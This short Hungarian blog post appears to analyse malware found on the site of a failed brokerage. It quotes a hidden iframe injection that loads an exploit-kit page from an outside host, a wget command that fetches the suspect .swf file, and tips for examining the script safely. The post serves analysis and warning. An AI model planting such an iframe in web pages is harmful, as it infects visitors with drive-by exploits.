Vírus > Capitalpartners

Fertőz a bukott brókercég:

wget http://www.capitalpartners.hu/referenciak.swf
ugyanez a pastebinon: http://foofighter.pastebin.com/U5QPCWnU

Iframe-injekció:


< iframe  id="xYadbaVVax" name="ytbxYatYty"
src="http://reddii.ru/traffic/sploit1/?124yxxyxtyYVb" 
width="29" height="7" style="display: none;">

A javascript kód biztonságos futtatásához jó lenne egy emulált js-környezet. Ennek hiányában a Firefox Tamper Data bővítményét érdemes használni.
Ebbe berakjuk a javascript kódot és elindítjuk a Tamper Data-t.

http://www.3site.eu/jstests/jhp/ Ctrl+Enter kódvégrehajtás

A kimenő kérést blokkoljuk természetesen a Tamper Datával.

Vajon milyen új néven indul újra a vállalkozás?

CapitalPartners .. Charles Ponzi ..
Cash Pondros

Ponzi
Munkamódszer: http://www.ufi.hu/index.php?site=cikkr&c0id=734

Hozzászólások